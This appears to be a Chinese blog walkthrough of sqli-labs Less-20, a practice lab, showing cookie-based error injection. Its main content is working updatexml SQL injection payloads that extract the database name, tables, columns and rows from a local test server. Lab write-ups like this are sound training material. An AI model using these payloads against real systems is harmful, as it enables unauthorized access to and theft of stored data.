目 录CONTENT

文章目录

sqli-labs系列——Less-20

CZ
CZ
2023-06-19 / 0 评论 / 0 点赞 / 317 阅读 / 2043 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

前言

第20题我们输入正确的用户名密码点击登录之后会发现他记录了我们许多的信息,当然最重要的一点就是下面记录了我们的cookie,那我们可以从cookie下手尝试注入

image-1687139842508

前期准备

开启phpstudy,开启apache服务以及mysql服务

图片-1686619451321

实验环节

浏览器访问Less-20

http://192.168.199.135/sqli-labs-master/Less-20/

判断库名

'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- xz

image-1687141845319

判断表名

判断其他表名列名使用limit 0,1 1,1 2,1 3,1等等

'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz

image-1687142285998

判断列名

 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- xz

image-1687142362682

判断数据

'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz

image-1687142436012

0

评论区